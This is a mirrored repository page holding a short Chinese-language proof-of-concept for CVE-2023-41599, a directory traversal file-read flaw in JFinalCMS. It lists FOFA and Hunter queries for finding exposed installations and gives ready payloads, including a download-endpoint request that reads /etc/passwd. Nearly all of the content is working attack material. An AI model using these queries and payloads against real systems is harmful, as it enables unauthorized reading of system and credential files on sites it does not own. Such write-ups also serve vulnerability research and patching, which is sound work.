admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/JFinalCMS/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

401 B
Raw Blame History

JFinalCMS 任意文件读取漏洞(CVE-2023-41599)

特征

fofa:
body="content=\"JreCms"

hunter:
web.body="content=\"JreCms"

POC

Windows: /../../../../../../../../../test.txt
Linux:	/../../../../../../../../../etc/passwd

/common/down/file?filekey=/../../../../../../../../../etc/passwd

漏洞分析

http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/